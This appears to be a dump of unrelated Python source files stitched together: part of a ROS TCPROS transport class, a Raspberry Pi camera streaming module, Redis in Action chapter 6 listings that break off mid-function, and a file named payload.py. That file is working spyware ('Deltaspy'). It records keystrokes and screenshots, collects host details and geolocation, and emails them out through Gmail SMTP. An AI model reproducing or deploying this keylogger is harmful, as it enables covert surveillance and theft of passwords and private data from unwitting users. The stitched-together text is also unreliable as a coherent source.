self.stat_bytes += write_ros_handshake_header(sock, protocol.get_header_fields())
if poller:
poller.unregister(fileno)
def read_header(self):
"""
Read TCPROS header from active socket
@raise TransportInitError if header fails to validate
"""
sock = self.socket
if sock is None:
return
sock.setblocking(1)
# TODO: add bytes received to self.stat_bytes
self._validate_header(read_ros_handshake_header(sock, self.read_buff, self.protocol.buff_size))
def send_message(self, msg, seq):
"""
Convenience routine for services to send a message across a
particular connection. NOTE: write_data is much more efficient
if same message is being sent to multiple connections. Not
threadsafe.
@param msg: message to send
@type msg: Msg
@param seq: sequence number for message
@type seq: int
@raise TransportException: if error occurred sending message
"""
# this will call write_data(), so no need to keep track of stats
serialize_message(self.write_buff, seq, msg)
self.write_data(self.write_buff.getvalue())
self.write_buff.truncate(0)
def write_data(self, data):
"""
Write raw data to transport
@raise TransportInitError: could not be initialized
@raise TransportTerminated: no longer open for publishing
"""
if not self.socket:
raise TransportInitError("TCPROS transport was not successfully initialized")
if self.done:
raise TransportTerminated("connection closed")
try:
#TODO: get rid of sendalls and replace with async-style publishing
self.socket.sendall(data)
self.stat_bytes += len(data)
self.stat_num_msg += 1
except IOError as ioe:
#for now, just document common errno's in code
(errno, msg) = ioe.args
if errno == 32: #broken pipe
logdebug("ERROR: Broken Pipe")
self.close()
raise TransportTerminated(str(errno)+msg)
raise #re-raise
except socket.error as se:
#for now, just document common errno's in code
(errno, msg) = se.args
if errno == 32: #broken pipe
logdebug("[%s]: Closing connection [%s] due to broken pipe", self.name, self.endpoint_id)
self.close()
raise TransportTerminated(msg)
elif errno == 104: #connection reset by peer
logdebug("[%s]: Peer [%s] has closed connection", self.name, self.endpoint_id)
self.close()
raise TransportTerminated(msg)
else:
rospydebug("unknown socket error writing data: %s",traceback.format_exc())
logdebug("[%s]: closing connection [%s] due to unknown socket error: %s", self.name, self.endpoint_id, msg)
self.close()
raise TransportTerminated(str(errno)+' '+msg)
return True
def receive_once(self):
"""
block until messages are read off of socket
@return: list of newly received messages
@rtype: [Msg]
@raise TransportException: if unable to receive message due to error
"""
sock = self.socket
if sock is None:
raise TransportException("connection not initialized")
b = self.read_buff
msg_queue = []
p = self.protocol
try:
sock.setblocking(1)
while not msg_queue and not self.done and not is_shutdown():
if b.tell() >= 4:
p.read_messages(b, msg_queue, sock)
if not msg_queue:
self.stat_bytes += recv_buff(sock, b, p.buff_size)
self.stat_num_msg += len(msg_queue) #STATS
# set the _connection_header field
for m in msg_queue:
m._connection_header = self.header
# #1852: keep track of last latched message
if self.is_latched and msg_queue:
self.latch = msg_queue[-1]
return msg_queue
except DeserializationError as e:
rospyerr(traceback.format_exc())
raise TransportException("receive_once[%s]: DeserializationError %s"%(self.name, str(e)))
except TransportTerminated as e:
raise #reraise
except ServiceException as e:
raise
except Exception as e:
rospyerr(traceback.format_exc())
raise TransportException("receive_once[%s]: unexpected error %s"%(self.name, str(e)))
def _reconnect(self):
# This reconnection logic is very hacky right now. I need to
# rewrite the I/O core so that this is handled more centrally.
if self.dest_address is None:
raise ROSInitException("internal error with reconnection state: address not stored")
interval = 0.5 # seconds
while self.socket is None and not self.done and not rospy.is_shutdown():
try:
# set a timeout so that we can continue polling for
# exit. 30. is a bit high, but I'm concerned about
# embedded platforms. To do this properly, we'd have
# to move to non-blocking routines.
self.connect(self.dest_address[0], self.dest_address[1], self.endpoint_id, timeout=30.)
except TransportInitError:
self.socket = None
if self.socket is None and interval < 30.:
# exponential backoff (maximum 32 seconds)
interval = interval * 2
time.sleep(interval)
def receive_loop(self, msgs_callback):
"""
Receive messages until shutdown
@param msgs_callback: callback to invoke for new messages received
@type msgs_callback: fn([msg])
"""
# - use assert here as this would be an internal error, aka bug
logger.debug("receive_loop for [%s]", self.name)
try:
while not self.done and not is_shutdown():
try:
if self.socket is not None:
msgs = self.receive_once()
if not self.done and not is_shutdown():
msgs_callback(msgs, self)
else:
self._reconnect()
except TransportException as e:
# set socket to None so we reconnect
try:
if self.socket is not None:
try:
self.socket.shutdown(socket.SHUT_RDWR)
except:
pass
finally:
self.socket.close()
except:
pass
self.socket = None
except DeserializationError as e:
#TODO: how should we handle reconnect in this case?
logerr("[%s] error deserializing incoming request: %s"%self.name, str(e))
rospyerr("[%s] error deserializing incoming request: %s"%self.name, traceback.format_exc())
except:
# in many cases this will be a normal hangup, but log internally
try:
#1467 sometimes we get exceptions due to
#interpreter shutdown, so blanket ignore those if
#the reporting fails
rospydebug("exception in receive loop for [%s], may be normal. Exception is %s",self.name, traceback.format_exc())
except: pass
rospydebug("receive_loop[%s]: done condition met, exited loop"%self.name)
finally:
if not self.done:
self.close()
def close(self):
"""close i/o and release resources"""
if not self.done:
try:
if self.socket is not None:
try:
self.socket.shutdown(socket.SHUT_RDWR)
except:
pass
finally:
self.socket.close()
finally:
self.socket = self.read_buff = self.write_buff = self.protocol = None
super(TCPROSTransport, self).close()
|
camera_pi.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# camera_pi.py
#
#
#
# Raspberry Pi camera module (developed by Miguel Grinberg)
import time
import io
import threading
import picamera
class Camera(object):
thread = None # background thread that reads frames from camera
frame = None # current frame is stored here by background thread
last_access = 0 # time of last client access to the camera
def initialize(self):
if Camera.thread is None:
# start background frame thread
Camera.thread = threading.Thread(target=self._thread)
Camera.thread.start()
# wait until frames start to be available
while self.frame is None:
time.sleep(0)
def get_frame(self):
Camera.last_access = time.time()
self.initialize()
return self.frame
@classmethod
def _thread(cls):
with picamera.PiCamera() as camera:
# camera setup
camera.resolution = (640, 480)
camera.framerate = 30
camera.hflip = False
camera.vflip = False
# let camera warm up
camera.start_preview()
time.sleep(2)
stream = io.BytesIO()
for foo in camera.capture_continuous(stream, 'jpeg',
use_video_port=True):
# store frame
stream.seek(0)
cls.frame = stream.read()
# reset stream for next frame
stream.seek(0)
stream.truncate()
# if there haven't been any clients asking for frames in
# the last 10 seconds stop the thread
if time.time() - cls.last_access > 10:
break
cls.thread = None
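# Hedged usage sketch (not part of the original module): get_frame() lazily starts
# the capture thread and returns the most recent JPEG bytes, so a web handler can
# poll it in a loop, e.g. to build a multipart MJPEG stream.
def example_mjpeg_generator():
    camera = Camera()
    while True:
        frame = camera.get_frame()
        yield (b'--frame\r\n'
               b'Content-Type: image/jpeg\r\n\r\n' + frame + b'\r\n')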
|
payload.py
|
from pynput import keyboard
import time
import threading
import datetime
import pyscreenshot
import smtplib
import socket
import requests
import platform
from email.message import EmailMessage
config = {}
class dspy:
def __init__(self, email, pwd, time, keylog, screenshot):
self.log = ""
self.email = email
self.pwd = pwd
self.time = time
self.keylog = keylog
self.screenshot = screenshot
def grab_screenshot(self):
img = pyscreenshot.grab()
img.save("temp.png")
def send_mail(self):
a=True
while a:
time.sleep(self.time)
log = self.log
self.log =""
newMessage = EmailMessage()
newMessage['Subject'] = "Deltaspy Report"
newMessage['From'] = self.email
newMessage['To'] = self.email
if self.keylog:
newMessage.set_content(log)
if self.screenshot:
self.grab_screenshot()
with open('temp.png', 'rb') as f:
img_data = f.read()
newMessage.add_attachment(img_data, maintype='image', subtype="png", filename=str(datetime.datetime.now()))
with smtplib.SMTP_SSL('smtp.gmail.com', 465) as smtp:
smtp.login(self.email, self.pwd)
smtp.send_message(newMessage)
smtp.close()
def get_key(self,key):
if "Key" in str(key):
k = str(key).replace("Key.","")
l = f"[{k}]"
if k =="space": l+=" "
elif k=="enter":l+="\n"
self.log += l
else:
self.log += str(key).replace('\'',"")
def send_details(self):
newMessage = EmailMessage()
newMessage['Subject'] = "Deltaspy Started"
newMessage['From'] = self.email
newMessage['To'] = self.email
hostname = socket.gethostname()
ip = socket.gethostbyname(hostname)
plt = platform.processor()
os = platform.system()
arch = platform.machine()
res = requests.get('https://ipinfo.io/')
data = res.json()
city = data['city']
region = data['region']
country = data['country']
location = data['loc']
timezone = data['timezone']
org = data['org']
msg = f"Hostname : {hostname} \nip : {ip} \nPlatform : {plt} \nOperating System : {os} \nArchitecture : {arch} \nCountry : {country} \nRegion : {region} \nCity : {city} \nLocation : {location} \nTimezone : {timezone} \nOrganisation : {org}"
newMessage.set_content(msg)
with smtplib.SMTP_SSL('smtp.gmail.com', 465) as smtp:
smtp.login(self.email, self.pwd)
smtp.send_message(newMessage)
smtp.close()
def run(self):
self.send_details()
email_thread = threading.Thread(target=self.send_mail)
email_thread.setDaemon(True)
email_thread.start()
with keyboard.Listener(on_press=self.get_key) as listener:
listener.join()
spy = dspy(config['email'], config['pwd'], config['time'], config['keylog'], config['screenshot'])
spy.run()
|
ch06_listing_source.py
|
import bisect
from collections import defaultdict, deque
import json
import math
import os
import time
import unittest
import uuid
import zlib
import redis
QUIT = False
pipe = inv = item = market = buyer = seller = inventory = None
# <start id="_1314_14473_8380"/>
def add_update_contact(conn, user, contact):
ac_list = 'recent:' + user
pipeline = conn.pipeline(True) #A
pipeline.lrem(ac_list, contact) #B
pipeline.lpush(ac_list, contact) #C
pipeline.ltrim(ac_list, 0, 99) #D
pipeline.execute() #E
# <end id="_1314_14473_8380"/>
#A Set up the atomic operation
#B Remove the contact from the list if it exists
#C Push the item onto the front of the list
#D Remove anything beyond the 100th item
#E Actually execute everything
#END
# <start id="_1314_14473_8383"/>
def remove_contact(conn, user, contact):
conn.lrem('recent:' + user, contact)
# <end id="_1314_14473_8383"/>
#END
# <start id="_1314_14473_8386"/>
def fetch_autocomplete_list(conn, user, prefix):
candidates = conn.lrange('recent:' + user, 0, -1) #A
matches = []
for candidate in candidates: #B
if candidate.lower().startswith(prefix): #B
matches.append(candidate) #C
return matches #D
# <end id="_1314_14473_8386"/>
#A Fetch the autocomplete list
#B Check each candidate
#C We found a match
#D Return all of the matches
#END
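# Hedged usage sketch (not in the original listing): record two recent contacts for
# a user and autocomplete against the prefix 'co'. Names are illustrative, and the
# expected result assumes a client configured to return strings.
def _example_recent_contacts(conn):
    add_update_contact(conn, 'user1', 'conrad')
    add_update_contact(conn, 'user1', 'cora')
    return fetch_autocomplete_list(conn, 'user1', 'co')  # most recent first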
# <start id="_1314_14473_8396"/>
valid_characters = '`abcdefghijklmnopqrstuvwxyz{' #A
def find_prefix_range(prefix):
posn = bisect.bisect_left(valid_characters, prefix[-1:]) #B
suffix = valid_characters[(posn or 1) - 1] #C
return prefix[:-1] + suffix + '{', prefix + '{' #D
# <end id="_1314_14473_8396"/>
#A Set up our list of characters that we know about
#B Find the position of prefix character in our list of characters
#C Find the predecessor character
#D Return the range
#END
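# Worked example (added for illustration, not in the original listing): '`' sorts
# just before 'a' and '{' just after 'z', so every member starting with the prefix
# sorts strictly between the two returned endpoints.
#   find_prefix_range('abc')  # -> ('abb{', 'abc{')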
# <start id="_1314_14473_8399"/>
def autocomplete_on_prefix(conn, guild, prefix):
start, end = find_prefix_range(prefix) #A
identifier = str(uuid.uuid4()) #A
start += identifier #A
end += identifier #A
zset_name = 'members:' + guild
conn.zadd(zset_name, start, 0, end, 0) #B
pipeline = conn.pipeline(True)
while 1:
try:
pipeline.watch(zset_name)
sindex = pipeline.zrank(zset_name, start) #C
eindex = pipeline.zrank(zset_name, end) #C
erange = min(sindex + 9, eindex - 2) #C
pipeline.multi()
pipeline.zrem(zset_name, start, end) #D
pipeline.zrange(zset_name, sindex, erange) #D
items = pipeline.execute()[-1] #D
break
except redis.exceptions.WatchError: #E
continue #E
return [item for item in items if '{' not in item] #F
# <end id="_1314_14473_8399"/>
#A Find the start/end range for the prefix
#B Add the start/end range items to the ZSET
#C Find the ranks of our end points
#D Get the values inside our range, and clean up
#E Retry if someone modified our autocomplete zset
#F Remove start/end entries if an autocomplete was in progress
#END
# <start id="_1314_14473_8403"/>
def join_guild(conn, guild, user):
conn.zadd('members:' + guild, user, 0)
def leave_guild(conn, guild, user):
conn.zrem('members:' + guild, user)
# <end id="_1314_14473_8403"/>
#END
# <start id="_1314_14473_8431"/>
def list_item(conn, itemid, sellerid, price):
#...
pipe.watch(inv) #A
if not pipe.sismember(inv, itemid): #B
pipe.unwatch() #B
return None
pipe.multi() #C
pipe.zadd("market:", item, price) #C
pipe.srem(inv, itemid) #C
pipe.execute() #C
return True
#...
# <end id="_1314_14473_8431"/>
#A Watch for changes to the user's inventory
#B Verify that the user still has the item to be listed
#C Actually list the item
#END
# <start id="_1314_14473_8435"/>
def purchase_item(conn, buyerid, itemid, sellerid, lprice):
#...
pipe.watch("market:", buyer) #A
price = pipe.zscore("market:", item) #B
funds = int(pipe.hget(buyer, 'funds')) #B
if price != lprice or price > funds: #B
pipe.unwatch() #B
return None
pipe.multi() #C
pipe.hincrby(seller, 'funds', int(price)) #C
pipe.hincrby(buyerid, 'funds', int(-price)) #C
pipe.sadd(inventory, itemid) #C
pipe.zrem("market:", item) #C
pipe.execute() #C
return True
#...
# <end id="_1314_14473_8435"/>
#A Watch for changes to the market and the buyer's account information
#B Check for a sold/repriced item or insufficient funds
#C Transfer funds from the buyer to the seller, and transfer the item to the buyer
#END
# <start id="_1314_14473_8641"/>
def acquire_lock(conn, lockname, acquire_timeout=10):
identifier = str(uuid.uuid4()) #A
end = time.time() + acquire_timeout
while time.time() < end:
if conn.setnx('lock:' + lockname, identifier): #B
return identifier
time.sleep(.001)
return False
# <end id="_1314_14473_8641"/>
#A A 128-bit random identifier
#B Get the lock
#END
# <start id="_1314_14473_8645"/>
def purchase_item_with_lock(conn, buyerid, itemid, sellerid):
buyer = "users:%s"%buyerid
seller = "users:%s"%sellerid
item = "%s.%s"%(itemid, sellerid)
inventory = "inventory:%s"%buyerid
end = time.time() + 30
locked = acquire_lock(conn, market) #A
if not locked:
return False
pipe = conn.pipeline(True)
try:
while time.time() < end:
try:
pipe.watch(buyer)
pipe.zscore("market:", item) #B
pipe.hget(buyer, 'funds') #B
price, funds = pipe.execute() #B
if price is None or price > funds: #B
pipe.unwatch() #B
return None #B
pipe.hincrby(seller, 'funds', int(price)) #C
pipe.hincrby(buyer, 'funds', int(-price)) #C
pipe.sadd(inventory, itemid) #C
pipe.zrem("market:", item) #C
pipe.execute() #C
return True
except redis.exceptions.WatchError:
pass
finally:
release_lock(conn, market, locked) #D
# <end id="_1314_14473_8645"/>
#A Get the lock
#B Check for a sold item or insufficient funds
#C Transfer funds from the buyer to the seller, and transfer the item to the buyer
#D Release the lock
#END
# <start id="_1314_14473_8650"/>
def release_lock(conn, lockname, identifier):
pipe = conn.pipeline(True)
lockname = 'lock:' + lockname
while True:
try:
pipe.watch(lockname) #A
if pipe.get(lockname) == identifier: #A
pipe.multi() #B
pipe.delete(lockname) #B
pipe.execute() #B
return True #B
pipe.unwatch()
break
except redis.exceptions.WatchError: #C
pass #C
return False #D
# <end id="_1314_14473_8650"/>
#A Check and verify that we still have the lock
#B Release the lock
#C Someone else did something with the lock, retry
#D We lost the lock
#END
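# Hedged usage sketch (not in the original listing): the usual
# acquire / try / finally pattern around a critical section.
def _example_with_lock(conn):
    locked = acquire_lock(conn, 'market:')
    if not locked:
        return False
    try:
        pass  # critical section: operate on the keys guarded by the lock
    finally:
        release_lock(conn, 'market:', locked)
    return True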
# <start id="_1314_14473_8790"/>
def acquire_lock_with_timeout(
conn, lockname, acquire_timeout=10, lock_timeout=10):
identifier = str(uuid.uuid4()) #A
lockname = 'lock:' + lockname
lock_timeout = int(math.ceil(lock_timeout)) #D
end = time.time() + acquire_timeout
while time.time() < end:
if conn.setnx(lockname, identifier): #B
conn.expire(lockname, lock_timeout) #B
return identifier
elif not conn.ttl(lockname): #C
conn.expire(lockname, lock_timeout) #C
time.sleep(.001)
return False
# <end id="_1314_14473_8790"/>
#A A 128-bit random identifier
#B Get the lock and set the expiration
#C Check and update the expiration time as necessary
#D Only pass integers to our EXPIRE calls
#END
# <start id="_1314_14473_8986"/>
def acquire_semaphore(conn, semname, limit, timeout=10):
identifier = str(uuid.uuid4()) #A
now = time.time()
pipeline = conn.pipeline(True)
pipeline.zremrangebyscore(semname, '-inf', now - timeout) #B
pipeline.zadd(semname, identifier, now) #C
pipeline.zrank(semname, identifier) #D
if pipeline.execute()[-1] < limit: #D
return identifier
conn.zrem(semname, identifier) #E
return None
# <end id="_1314_14473_8986"/>
#A A 128-bit random identifier
#B Time out old semaphore holders
#C Try to acquire the semaphore
#D Check to see if we have it
#E We failed to get the semaphore, discard our identifier
#END
# <start id="_1314_14473_8990"/>
def release_semaphore(conn, semname, identifier):
return conn.zrem(semname, identifier) #A
# <end id="_1314_14473_8990"/>
#A Returns True if the semaphore was properly released, False if it had timed out
#END
# <start id="_1314_14473_9004"/>
def acquire_fair_semaphore(conn, semname, limit, timeout=10):
identifier = str(uuid.uuid4()) #A
czset = semname + ':owner'
ctr = semname + ':counter'
now = time.time()
pipeline = conn.pipeline(True)
pipeline.zremrangebyscore(semname, '-inf', now - timeout) #B
pipeline.zinterstore(czset, {czset: 1, semname: 0}) #B
pipeline.incr(ctr) #C
counter = pipeline.execute()[-1] #C
pipeline.zadd(semname, identifier, now) #D
pipeline.zadd(czset, identifier, counter) #D
pipeline.zrank(czset, identifier) #E
if pipeline.execute()[-1] < limit: #E
return identifier #F
pipeline.zrem(semname, identifier) #G
pipeline.zrem(czset, identifier) #G
pipeline.execute()
return None
# <end id="_1314_14473_9004"/>
#A A 128-bit random identifier
#B Time out old entries
#C Get the counter
#D Try to acquire the semaphore
#E Check the rank to determine if we got the semaphore
#F We got the semaphore
#G We didn't get the semaphore, clean out the bad data
#END
# <start id="_1314_14473_9014"/>
def release_fair_semaphore(conn, semname, identifier):
pipeline = conn.pipeline(True)
pipeline.zrem(semname, identifier)
pipeline.zrem(semname + ':owner', identifier)
return pipeline.execute()[0] #A
# <end id="_1314_14473_9014"/>
#A Returns True if the semaphore was properly released, False if it had timed out
#END
# <start id="_1314_14473_9022"/>
def refresh_fair_semaphore(conn, semname, identifier):
if conn.zadd(semname, identifier, time.time()): #A
release_fair_semaphore(conn, semname, identifier) #B
return False #B
return True #C
# <end id="_1314_14473_9022"/>
#A Update our semaphore
#B We lost our semaphore, report back
#C We still have our semaphore
#END
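# Hedged usage sketch (not in the original listing): acquire a fair semaphore,
# refresh it while holding it, and always release it. The semaphore name and
# limit below are illustrative.
def _example_with_semaphore(conn):
    sem_id = acquire_fair_semaphore(conn, 'api-limit', 5, timeout=10)
    if sem_id is None:
        return False  # too many concurrent holders
    try:
        refresh_fair_semaphore(conn, 'api-limit', sem_id)  # extend our hold
    finally:
        release_fair_semaphore(conn, 'api-limit', sem_id)
    return True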
# <start id="_1314_14473_9031"/>
def acquire_semaphore_with_lock(conn, semname, limit, timeout=10):
identifier = acquire_lock(conn, semname, acquire_timeout=.01)
if identifier:
try:
return acquire_fair_semaphore(conn, semname, limit, timeout)
finally:
release_lock(conn, semname, identifier)
# <end id="_1314_14473_9031"/>
#END
# <start id="_1314_14473_9056"/>
def send_sold_email_via_queue(conn, seller, item, price, buyer):
data = {
'seller_id': seller, #A
'item_id': item, #A
'price': price, #A
'buyer_id': buyer, #A
'time': time.time() #A
}
conn.rpush('queue:email', json.dumps(data)) #B
# <end id="_1314_14473_9056"/>
#A Prepare the item
#B Push the item onto the queue
#END
# <start id="_1314_14473_9060"/>
def process_sold_email_queue(conn):
while not QUIT:
packed = conn.blpop(['queue:email'], 30) #A
if not packed: #B
continue #B
to_send = json.loads(packed[1]) #C
try:
fetch_data_and_send_sold_email(to_send) #D
except EmailSendError as err:
log_error("Failed to send sold email", err, to_send)
else:
log_success("Sent sold email", to_send)
# <end id="_1314_14473_9060"/>
#A Try to get a message to send
#B No message to send, try again
#C Load the packed email information
#D Send the email using our pre-written emailing function
#END
# <start id="_1314_14473_9066"/>
def worker_watch_queue(conn, queue, callbacks):
while not QUIT:
packed = conn.blpop([queue], 30) #A
if not packed: #B
continue #B
name, args = json.loads(packed[1]) #C
if name not in callbacks: #D
log_error("Unknown callback %s"%name) #D
continue #D
callbacks[name](*args) #E
# <end id="_1314_14473_9066"/>
#A Try to get an item from the queue
#B There is nothing to work on, try again
#C Unpack the work item
#D The function is unknown, log the error and try again
#E Execute the task
#END
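# Hedged usage sketch (not in the original listing): tasks are queued as JSON
# [name, args] pairs and dispatched through a callbacks dict. The callback name is
# illustrative; worker_watch_queue() loops until QUIT is set.
def _example_queue_round_trip(conn):
    conn.rpush('queue:email', json.dumps(['log_sale', ['seller-1', 97]]))
    callbacks = {'log_sale': lambda seller, price: None}  # placeholder callback
    worker_watch_queue(conn, 'queue:email', callbacks)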
# <start id="_1314_14473_9074"/>
def worker_watch_queues(conn, queues, callbacks): #A
while not QUIT:
packed = conn.blpop(queues, 30) #B
if not packed:
continue
name, args = json.loads(packed[1])
if name not in callbacks:
log_error("Unknown callback %s"%name)
continue
callbacks[name](*args)
# <end id="_1314_14473_9074"/>
#A The first changed line to add priority support
#B The second changed line to add priority support
#END
# <start id="_1314_14473_9094"/>
def execute_later(conn, queue, name, args, delay=0):
identifier = str(uuid.uuid4()) #A
item = json.dumps([identifier, queue, name, args]) #B
if delay > 0:
conn.zadd('delayed:', item, time.time() + delay) #C
else:
conn.rpush('queue:' + queue, item) #D
return identifier #E
# <end id="_1314_14473_9094"/>
#A Generate a unique identifier
#B Prepare the item for the queue
#C Delay the item
#D Execute the item immediately
#E Return the identifier
#END
# <start id="_1314_14473_9099"/>
def poll_queue(conn):
while not QUIT:
item = conn.zrange('delayed:', 0, 0, withscores=True) #A
if not item or item[0][1] > time.time(): #B
time.sleep(.01) #B
continue #B
item = item[0][0] #C
identifier, queue, function, args = json.loads(item) #C
locked = acquire_lock(conn, identifier) #D
if not locked: #E
continue #E
if conn.zrem('delayed:', item): #F
conn.rpush('queue:' + queue, item) #F
release_lock(conn, identifier, locked) #G
# <end id="_1314_14473_9099"/>
#A Get the first item in the queue
#B No item or the item is still to be executed in the future
#C Unpack the item so that we know where it should go
#D Get the lock for the item
#E We couldn't get the lock, so skip it and try again
#F Move the item to the proper list queue
#G Release the lock
#END
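# Hedged usage sketch (not in the original listing): schedule a task 30 seconds
# out; poll_queue() (running in its own thread or process) moves it onto
# 'queue:email' once the delay expires, where a worker picks it up.
def _example_delayed_task(conn):
    return execute_later(conn, 'email', 'log_sale', ['seller-1', 97], delay=30)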
# <start id="_1314_14473_9124"/>
def create_chat(conn, sender, recipients, message, chat_id=None):
chat_id = chat_id or str(conn.incr('ids:chat:')) #A
recipients.append(sender) #E
recipientsd = dict((r, 0) for r in recipients) #E
pipeline = conn.pipeline(True)
pipeline.zadd('chat:' + chat_id, **recipientsd) #B
for rec in recipients: #C
pipeline.zadd('seen:' + rec, chat_id, 0) #C
pipeline.execute()
return send_message(conn, chat_id, sender, message) #D
# <end id="_1314_14473_9124"/>
#A Get a new chat id
#E Set up a dictionary of users to scores to add to the chat ZSET
#B Create the set with the list of people participating
#C Initialize the seen zsets
#D Send the message
#END
# <start id="_1314_14473_9127"/>
def send_message(conn, chat_id, sender, message):
identifier = acquire_lock(conn, 'chat:' + chat_id)
if not identifier:
raise Exception("Couldn't get the lock")
try:
mid = conn.incr('ids:' + chat_id) #A
ts = time.time() #A
packed = json.dumps({ #A
'id': mid, #A
'ts': ts, #A
'sender': sender, #A
'message': message, #A
}) #A
conn.zadd('msgs:' + chat_id, packed, mid) #B
finally:
release_lock(conn, 'chat:' + chat_id, identifier)
return chat_id
# <end id="_1314_14473_9127"/>
#A Prepare the message
#B Send the message to the chat
#END
# <start id="_1314_14473_9132"/>
def fetch_pending_messages(conn, recipient):
seen = conn.zrange('seen:' + recipient, 0, -1, withscores=True) #A
pipeline = conn.pipeline(True)
for chat_id, seen_id in seen: #B
pipeline.zrangebyscore( #B
'msgs:' + chat_id, seen_id+1, 'inf') #B
chat_info = zip(seen, pipeline.execute()) #C
for i, ((chat_id, seen_id), messages) in enumerate(chat_info):
if not messages:
continue
messages[:] = map(json.loads, messages)
seen_id = messages[-1]['id'] #D
conn.zadd('chat:' + chat_id, recipient, seen_id) #D
min_id = conn.zrange( #E
'chat:' + chat_id, 0, 0, withscores=True) #E
pipeline.zadd('seen:' + recipient, chat_id, seen_id) #F
if min_id:
pipeline.zremrangebyscore( #G
'msgs:' + chat_id, 0, min_id[0][1]) #G
chat_info[i] = (chat_id, messages)
pipeline.execute()
return chat_info
# <end id="_1314_14473_9132"/>
#A Get the last message ids received
#B Fetch all new messages
#C Prepare information about the data to be returned
#D Update the 'chat' ZSET with the most recently received message
#E Discover messages that have been seen by all users
#F Update the 'seen' ZSET
#G Clean out messages that have been seen by all users
#END
# <start id="_1314_14473_9135"/>
def join_chat(conn, chat_id, user):
message_id = int(conn.get('ids:' + chat_id)) #A
pipeline = conn.pipeline(True)
pipeline.zadd('chat:' + chat_id, user, message_id) #B
pipeline.zadd('seen:' + user, chat_id, message_id) #C
pipeline.execute()
# <end id="_1314_14473_9135"/>
#A Get the most recent message id for the chat
#B Add the user to the chat member list
#C Add the chat to the user's seen list
#END
# <start id="_1314_14473_9136"/>
def leave_chat(conn, chat_id, user):
pipeline = conn.pipeline(True)
pipeline.zrem('chat:' + chat_id, user) #A
pipeline.zrem('seen:' + user, chat_id) #A
pipeline.zcard('chat:' + chat_id) #B
if not pipeline.execute()[-1]:
pipeline.delete('msgs:' + chat_id) #C
pipeline.delete('ids:' + chat_id) #C
pipeline.execute()
else:
oldest = conn.zrange( #D
'chat:' + chat_id, 0, 0, withscores=True) #D
conn.zremrangebyscore('msgs:' + chat_id, 0, oldest[0][1]) #E
# <end id="_1314_14473_9136"/>
#A Remove the user from the chat
#B Find the number of remaining group members
#C Delete the chat
#D Find the oldest message seen by all users
#E Delete old messages from the chat
#END
# <start id="_1314_15044_3669"/>
aggregates = defaultdict(lambda: defaultdict(int)) #A
def daily_country_aggregate(conn, line):
if line:
line = line.split()
ip = line[0] #B
day = line[1] #B
country = find_city_by_ip_local(ip)[2] #C
aggregates[day][country] += 1 #D
return
for day, aggregate in aggregates.items(): #E
conn.zadd('daily:country:' + day, **aggregate) #E
del aggregates[day] #E
# <end id="_1314_15044_3669"/>
#A Prepare the local aggregate dictionary
#B Extract the information from our log lines
#C Find the country from the IP address
#D Increment our local aggregate
#E The day file is done, write our aggregate to Redis
#END
# <start id="_1314_14473_9209"/>
def copy_logs_to_redis(conn, path, channel, count=10,
limit=2**30, quit_when_done=True):
bytes_in_redis = 0
waiting = deque()
create_chat(conn, 'source', map(str, range(count)), '', channel) #I
count = str(count)
for logfile in sorted(os.listdir(path)): #A
full_path = os.path.join(path, logfile)
fsize = os.stat(full_path).st_size
while bytes_in_redis + fsize > limit: #B
cleaned = _clean(conn, channel, waiting, count)#B
if cleaned: #B
bytes_in_redis -= cleaned #B
else: #B
time.sleep(.25) #B
with open(full_path, 'rb') as inp: #C
block = ' ' #C
while block: #C
block = inp.read(2**17) #C
conn.append(channel+logfile, block) #C
send_message(conn, channel, 'source', logfile) #D
bytes_in_redis += fsize #E
waiting.append((logfile, fsize)) #E
if quit_when_done: #F
send_message(conn, channel, 'source', ':done') #F
while waiting: #G
cleaned = _clean(conn, channel, waiting, count) #G
if cleaned: #G
bytes_in_redis -= cleaned #G
else: #G
time.sleep(.25) #G
def _clean(conn, channel, waiting, count): #H
if not waiting: #H
return 0 #H
w0 = waiting[0][0] #H
if conn.get(channel + w0 + ':done') == count: #H
conn.delete(channel + w0, channel + w0 + ':done') #H
return waiting.popleft()[1] #H
return 0 #H
# <end id="_1314_14473_9209"/>
#I Create the chat that will be used to send messages to clients
#A Iterate over all of the logfiles
#B Clean out finished files if we need more room
#C Upload the file to Redis
#D Notify the listeners that the file is ready
#E Update our local information about Redis' memory use
#F We are out of files, so signal that it is done
#G Clean up the files when we are done
#H How we actually perform the cleanup from Redis
#END
# <start id="_1314_14473_9213"/>
def process_logs_from_redis(conn, id, callback):
while 1:
fdata = fetch_pending_messages(conn, id) #A
for ch, mdata in fdata:
for message in mdata:
logfile = message['message']
if logfile == ':done': #B
return #B
elif not logfile:
continue
block_reader = readblocks #C
if logfile.endswith('.gz'): #C
block_reader = readblocks_gz #C
for line in readlines(conn, ch+logfile, block_reader):#D
callback(conn, line) #E
callback(conn, None) #F
conn.incr(ch + logfile + ':done') #G
if not fdata:
time.sleep(.1)
# <end id="_1314_14473_9213"/>
#A Fetch the list of files
#B No more logfiles
#C Choose a block reader
#D Iterate over the lines
#E Pass each line to the callback
#F Force a flush of our aggregate caches
#G Report that we are finished with the log
#END
# <start id="_1314_14473_9221"/>
def readlines(conn, key, rblocks):
out = ''
for block in rblocks(conn, key):
out += block
posn = out.rfind('\n') #A
if posn >= 0: #B
for line in out[:posn].split('\n'): #C
yield line + '\n' #D
out = out[posn+1:] #E
if not block: #F
yield out
break
# <end id="_1314_14473_9221"/>
#A Find the rightmost linebreak if any - rfind() returns -1 on failure
#B We found a line break
#C Split on all of the line breaks
#D Yield each line
#E Keep track of the trailing data
#F We are out of data
#END
# <start id="_1314_14473_9225"/>
def readblocks(conn, key, blocksize=2**17):
lb = blocksize
pos = 0
while lb == blocksize: #A
block = conn.substr(key, pos, pos + blocksize - 1) #B
yield block #C
lb = len(block) #C
pos += lb #C
yield ''
# <end id="_1314_14473_9225"/>
#A Keep going while we got as much as we expected
#B Fetch the block
#C Prepare for the next pass
#END
# <start id="_1314_14473_9229"/>
def readblocks_gz(conn, key):
inp = ''
decoder = None
for block in readblocks(conn, key, 2**17): #A
if not decoder:
inp += block
try:
if inp[:3] != "\x1f\x8b\x08": #B
raise IOError("invalid gzip data") #B
i = 10 #B
flag = ord(inp[3]) #B
if flag & 4: #B
i += 2 + ord(inp[i]) + 256*ord(inp[i+1]) #B
if flag & 8: #B
i = inp.index('\0', i) + 1 #B
if flag & 16: #B
i = inp.index('\0', i) + 1 #B
if flag & 2: #B
i += 2 #B
if i > len(inp): #C
raise IndexError("not enough data") #C
except (IndexError, ValueError): #C
continue #C
else:
block = inp[i:] #D
inp = None #D
